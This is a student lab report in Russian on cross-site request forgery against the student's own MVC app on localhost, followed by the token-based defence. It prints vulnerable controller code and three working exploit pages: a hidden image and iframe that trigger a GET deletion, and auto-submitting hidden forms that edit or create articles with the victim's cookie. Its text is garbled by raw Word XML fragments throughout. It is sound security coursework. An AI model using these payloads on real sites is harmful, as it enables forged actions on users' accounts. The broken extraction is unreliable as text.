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Отчет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Студент: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Рудаков Руслан Андреевич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Группа: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ИВ1-23-2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Цель работы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Изучить механизм CSRF-атак (Cross-Site Request Forgery) на примере собственного MVC-приложения, продемонстрировать три вектора эксплуатации (GET-удаление, POST-изменение, POST-создание) и реализовать защиту от них.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Кейс 1.1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CSRF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через GET: удаление статьи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Уязвимый роут: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r"^/articles/(\d+)/delete$": [ArticlesController, ArticlesController.delete]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Уязвимый код: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def delete(self, request, response, id):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 = Article.get_by_id(id)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if article is None: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raise NotFoundException('Статья не найдена')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article.delete()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response.status_code = 302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response.headers = [('Location', '/articles')]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Эксплойт evil.html (на хосте 9999):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&lt;html&gt;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&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;title&gt;Милые котики&lt;/title&gt;&lt;/head&gt;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  &lt;h1&gt;Милые котики </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol" w:eastAsia="Segoe UI Symbol"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">🐱</w:t>
      </w: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&lt;/h1&gt;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  &lt;img src="http://127.0.0.1:8080/articles/7/delete" width="1" height="1" alt=""&gt;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  &lt;iframe src="http://127.0.0.1:8080/articles/7/delete" style="display:none"&gt;&lt;/iframe&gt;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Ход атаки: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Victim залогинен на 127.0.0.1:8080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cookie token=10:a4373d551c... (HttpOnly, SameSite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не задан, Secure отсутствует).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Victim открывает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00000"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="28"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:9999/evil.html</w:t>
        </w:r>
      </w:hyperlink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в новой вкладке.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Браузер автоматически отправляет GET /articles/7/delete на уязвимый сайт с cookie victim.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6930" w:dyaOrig="4245">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000000" style="width:346.500000pt;height:212.2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1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40" w:dyaOrig="4649">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000001" style="width:432.000000pt;height:232.4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3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Второй запрос к тому же URL (из &lt;iframe&gt;) вернул 404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сервер сообщил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Статья не найдена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»,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что подтверждает: первый запрос реально удалил статью.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Итог: статья victim удалена без его ведома. </w:t>
      </w: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CSRF-</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve">атака успешна.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Кейс 1.2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 CSRF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через POST: изменение статьи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Уязвимый роут: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r"^/articles/(\d+)/edit$": [ArticlesController, ArticlesController.edit]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Уязвимый код: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def edit(self, request, response, id):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 = Article.get_by_id(id)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if article is None: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raise NotFoundException('Статья не найдена')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if self.user is None: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raise UnauthorizedException('Необходимо авторизоваться')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if request.method == 'POST':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article.set_name(request.POST['name'])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article.set_text(request.POST['text'])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article.save()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response.status_code = 302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response.headers = [('Location', f'/article/{article.get_id()}')]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    return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Проверка self.user is None не защищает: self.user восстанавливается из cookie token, а cookie у жертвы есть.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Поля формы (из views/articles/edit.html): name, text.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Эксплойт evil-edit.html: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&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;/head&gt;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&lt;body onload="document.f.submit()"&gt;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&lt;form name="f" action="http://127.0.0.1:8080/articles/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/edit" method="POST"&gt;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&lt;input type="hidden" name="name" value="ВЗЛОМАНО ЧЕРЕЗ CSRF"&gt;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&lt;input type="hidden" name="text" value="Эта статья изменена от имени жертвы через CSRF."&gt;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&lt;/form&gt;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8640" w:dyaOrig="5520">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000002" style="width:432.000000pt;height:276.0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object w:dxaOrig="7485" w:dyaOrig="8835">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000003" style="width:374.250000pt;height:441.7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B05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  <w:r>
        <w:object w:dxaOrig="8640" w:dyaOrig="5220">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000004" style="width:432.000000pt;height:261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B05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Ход атаки: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Victim залогинен, открывает </w:t>
      </w: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http://127.0.0.1:9999/evil-edit.html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Страница автоматически сабмитит форму (через onload="document.f.submit()").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Уходит POST /articles/8/edit с cookie victim.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B05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Итог: статья victim изменена без его ведома. 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8"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">атака успешна.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Кейс 1.3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CSRF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через POST: создание статьи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Уязвимый роут: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r"^/articles/add$": [ArticlesController, ArticlesController.add]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Уязвимый код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def add(self, request, response):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 = Article()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article.set_author_id(1)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article.set_name('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Новая статья')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article.set_text('dsadsa')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article.save()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Метод игнорирует request.POST, но факт создания статьи от имени жертвы всё равно имеет место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CSRF-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атака успешна.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Эксплойт evil-add.html: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&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;/head&gt;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&lt;body onload="document.f.submit()"&gt;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&lt;form name="f" action="http://127.0.0.1:8080/articles/add" method="POST"&gt;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&lt;input type="hidden" name="name" value="Статья от имени жертвы"&gt;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  &lt;input type="hidden" name="text" value="Создана через CSRF без ведома жертвы."&gt;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  &lt;/form&gt;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FF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Ход атаки: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Жертва (victim) авторизована на </w:t>
      </w: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http://127.0.0.1:8080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и имеет cookie token.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Жертва открывает сторонний сайт </w:t>
      </w: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http://127.0.0.1:9999/evil-add.html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При загрузке страницы срабатывает onload="document.f.submit()"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форма автоматически отправляет POST-запрос на /articles/add.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Браузер автоматически прикладывает cookie victim к запросу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(SameSite не задан, поэтому cookie уходит в кросс-сайтовом запросе).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Сервер выполняет ArticlesController.add и создаёт новую статью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от имени жертвы без её ведома.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(DevTools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Network):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Параметр         | Значение                                              |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|------------------|-------------------------------------------------------|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| Request URL      | </w:t>
      </w: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http://127.0.0.1:8080/articles/add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|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| Request Method   | POST                                                  |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| Status Code      | 302 Found                                             |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| Referer          |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http://127.0.0.1:9999/evil-add.html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|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| Content-Type     | application/x-www-form-urlencoded                     |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5760">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000005" style="width:432.000000pt;height:288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6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Итог: статья успешно создана от имени victim без его ведома.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CSRF-атака успешна. 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Задание 2. На виртуальной машине bee-box проэксплуатировать СSRF уязвимости.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CSRF (Change Password)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640" w:dyaOrig="2355">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000006" style="width:432.000000pt;height:117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8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40" w:dyaOrig="1980">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000007" style="width:432.000000pt;height:99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20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40" w:dyaOrig="6630">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000008" style="width:432.000000pt;height:331.5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22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CSRF (Change Secret)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40" w:dyaOrig="1950">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000009" style="width:432.000000pt;height:97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4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40" w:dyaOrig="1950">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000010" style="width:432.000000pt;height:97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6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CSRF (Transfer Amount)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40" w:dyaOrig="1709">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000011" style="width:432.000000pt;height:85.4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8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object w:dxaOrig="8640" w:dyaOrig="1844">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000012" style="width:432.000000pt;height:92.2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30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Задание 3. Защита от CSRF-атаки в MVC-приложении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Ход работы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ходе анализа уязвимости (Задание 1) были выявлены три вектора CSRF в разработанном MVC-приложении: удаление статьи через GET-запрос, изменение статьи и создание статьи через POST-запросы. Все три вектора успешно эксплуатировались, что подтвердило отсутствие CSRF-защиты. Для устранения уязвимости реализованы защитные меры по двум направлениям: защита POST-запросов (пункт 1.1) и защита GET-запросов (пункт 1.2).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1.1. Защита от CSRF при POST-запросах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защиты POST-запросов применён паттерн Synchronizer Token Pattern, при котором на сервере генерируется случайный токен, передаётся в форму и проверяется при обработке запроса.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Первым шагом в конструктор базового класса Controller добавлена генерация CSRF-токена. Токен создаётся функцией secrets.token_hex(16), сохраняется в cookie csrftoken с флагами HttpOnly и SameSite=Lax, а также передаётся в представление через set_var('csrf_token', ...). Добавлен метод set_csrf_cookie(), который устанавливает cookie в ответ, если её ещё нет у клиента. Cookie аутентификации token в методе sign_in контроллера UsersController также дополнена флагом SameSite=Lax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это предотвращает автоматическую отправку cookie браузером при кросс-сайтовых POST-запросах, что является дополнительным барьером на уровне браузера.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Вторым шагом во все формы добавлено скрытое поле csrf_token. В шаблоне edit.html поле добавлено в форму редактирования статьи, в шаблоне articles.html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форму удаления. В методах index и view контроллера ArticlesController токен передаётся в шаблоны через параметр csrf_token, а также вызывается метод set_csrf_cookie(), чтобы cookie гарантированно установилась у клиента.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Третьим шагом в контроллер ArticlesController добавлен вспомогательный метод _check_csrf(request). Метод извлекает значение токена из формы (request.POST['csrf_token']) и из cookie (request.cookies['csrftoken']), сравнивает их и выбрасывает исключение UnauthorizedException при несовпадении или отсутствии одного из значений. Вызов этого метода добавлен в начало POST-веток в методах edit и add.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методе edit помимо CSRF-проверки добавлена проверка владельца статьи: если article.get_author_id() != self.user.get_id(), выбрасывается исключение. Это устраняет возможность изменения чужой статьи даже при наличии валидного CSRF-токена. В методе add после CSRF-проверки автор статьи устанавливается из сессии через self.user.get_id() (ранее там был хардкод 1, что приводило к созданию статей с несуществующим автором), а поля name и text читаются из request.POST. Это одновременно устраняет уязвимость и побочный дефект, выявленный при эксплуатации.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1.2. Защита от CSRF при GET-запросах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Основной принцип защиты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запрет изменения состояния через GET-запросы, поскольку GET должен быть идемпотентным и безопасным методом.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методе delete контроллера ArticlesController добавлена первая строка проверки метода: если request.method != 'POST', выбрасывается UnauthorizedException('Метод не разрешён'). Это означает, что все GET-запросы на удаление (в том числе ранее работавший эксплойт через &lt;img src&gt; или &lt;iframe src&gt;) будут отклонены ещё до выполнения каких-либо действий с базой данных. После проверки метода вызывается _check_csrf(request), затем проверка авторизации и проверка владельца статьи.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шаблоне articles.html ссылка &lt;a href="/articles/{{article.get_id()}}/delete"&gt;Удалить&lt;/a&gt; заменена на POST-форму с hidden-полем csrf_token. Это меняет способ отправки запроса на удаление: вместо GET-перехода теперь отправляется POST с токеном, который сервер проверяет.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Дополнительно в шаблоне articles.html исправлена строка вывода автора. Было {{ article.get_author().get_nickname() }}, стало {% if article.get_author() %}{{ article.get_author().get_nickname() }}{% else %}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—{% endif %}.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Это предотвращает падение шаблона с ошибкой jinja2.exceptions.UndefinedError: 'None' has no attribute 'get_nickname' в случае, если для статьи не найден автор. Данный побочный дефект был выявлен при эксплуатации CSRF-атаки 1.3: статьи, созданные через уязвимый add с хардкодом author_id=1, рендерились с ошибкой 500.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Проверка эффективности защиты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После внедрения защиты были повторно выполнены все три ранее работавшие атаки.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Атака через GET на удаление статьи (evil-delete.html с тегом &lt;img src=".../articles/7/delete"&gt;)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сервер вернул UnauthorizedException: Метод не разрешён, статья не удалена.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Атака через POST на изменение статьи (evil-edit.html с формой на /articles/8/edit)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сервер вернул UnauthorizedException: CSRF token invalid, статья не изменена.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Атака через POST на создание статьи (evil-add.html с формой на /articles/add)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сервер вернул UnauthorizedException: CSRF token invalid, статья не создана.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Корректные запросы с валидным CSRF-токеном (отправленные из легитимной формы приложения) выполняются штатно: сервер обрабатывает запрос и возвращает редирект 302.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Выводы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 ходе выполнения задания установлено, что разработанное MVC-приложение было уязвимо к CSRF-атакам по трём векторам: удаление статьи через GET, изменение и создание статьи через POST. Причинами уязвимости являлись отсутствие CSRF-токена в формах и его проверки на сервере, использование GET-метода для изменения состояния (нарушение идемпотентности HTTP), отсутствие флага SameSite на cookie аутентификации и отсутствие проверки владельца ресурса.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Для защиты реализованы следующие меры. Применён паттерн Synchronizer Token Pattern: случайный токен генерируется на сервере, сохраняется в cookie с флагами HttpOnly и SameSite=Lax, передаётся во все формы через hidden-поле и проверяется на сервере при каждом POST-запросе. Cookie аутентификации дополнена флагом SameSite=Lax, что блокирует автоматическую отправку cookie браузером при кросс-сайтовых POST-запросах. Метод delete переведён в режим POST-only, что исключает эксплуатацию через GET. Добавлена проверка владельца статьи в методах edit и delete. Дополнительно устранён побочный дефект метода add, связанный с некорректным сохранением author_id, и добавлена проверка article.get_author() на None в шаблоне.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После внедрения защиты все три ранее успешные CSRF-атаки перестали работать: GET-запрос на удаление отклоняется как недопустимый метод, POST-запросы без валидного CSRF-токена отклоняются с исключением UnauthorizedException. Корректные запросы с токеном обрабатываются штатно.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Реализованная защита соответствует рекомендациям OWASP CSRF Prevention Cheat Sheet и полностью закрывает выявленные CSRF-уязвимости в разработанном MVC-приложении.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3.bin" Id="docRId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship TargetMode="External" Target="http://127.0.0.1:8080/articles/add" Id="docRId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image8.wmf" Id="docRId23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Mode="External" Target="http://127.0.0.1:9999/evil-add.html" Id="docRId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="embeddings/oleObject8.bin" Id="docRId22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://127.0.0.1:9999/evil.html" Id="docRId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://127.0.0.1:8080/" Id="docRId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image7.wmf" Id="docRId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="media/image11.wmf" Id="docRId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="media/image3.wmf" Id="docRId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="http://127.0.0.1:9999/evil-add.html" Id="docRId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="embeddings/oleObject7.bin" Id="docRId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="embeddings/oleObject11.bin" Id="docRId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject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embeddings/oleObject6.bin" Id="docRId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="media/image0.wmf" Id="docRId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="media/image10.wmf" Id="docRId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="embeddings/oleObject12.bin" Id="docRId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship TargetMode="External" Target="http://127.0.0.1:9999/evil-edit.html" Id="docRId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image6.wmf" Id="docRId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="embeddings/oleObject10.bin" Id="docRId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="media/image12.wmf" Id="docRId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="embeddings/oleObject2.bin" Id="docRId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="embeddings/oleObject5.bin" Id="docRId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="media/image9.wmf" Id="docRId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="numbering.xml" Id="docRId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" /><Relationship Target="media/image1.wmf" Id="docRId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="media/image5.wmf" Id="docRId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="embeddings/oleObject9.bin" Id="docRId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="styles.xml" Id="docRId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" /></Relationships>
</file>